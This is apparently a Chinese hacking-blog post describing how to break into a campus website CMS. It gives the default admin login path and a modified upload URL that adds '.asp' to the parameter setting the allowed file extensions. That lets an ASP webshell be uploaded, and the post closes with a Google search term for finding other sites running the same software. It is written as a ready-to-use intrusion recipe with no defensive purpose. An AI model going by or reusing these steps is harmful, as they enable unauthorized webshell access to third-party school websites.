某校园网站漏洞

作者：hack1990 时间：10-10-24 阅读数：590人阅读

后台默认地址

http://www.iick.blog/xyadmin/login.asp

普通上传图片的地方不允许上传JPG bmp gif swl doc xls外的文件。
但是在“基本信息”处可有上传首页LOGO和广告横幅的按钮。

点击进入一页面，地址为
http://www.iick.blog/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg

发现问题了没有？对文件后缀的过滤式通过变量赋值来实现的。
把上传页面地址改为

http://www.iick.blog/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg.asp

打开

直接上传ASPSHELL，查看源文件得到WEBSHELL地址。

GOOGLE了一下 inurl:xyadmin

# Nmap Security Scanner 7.0

上一篇：逍遥网店漏洞

下一篇：桃源网盘Getshell漏洞

相关文章

发表评论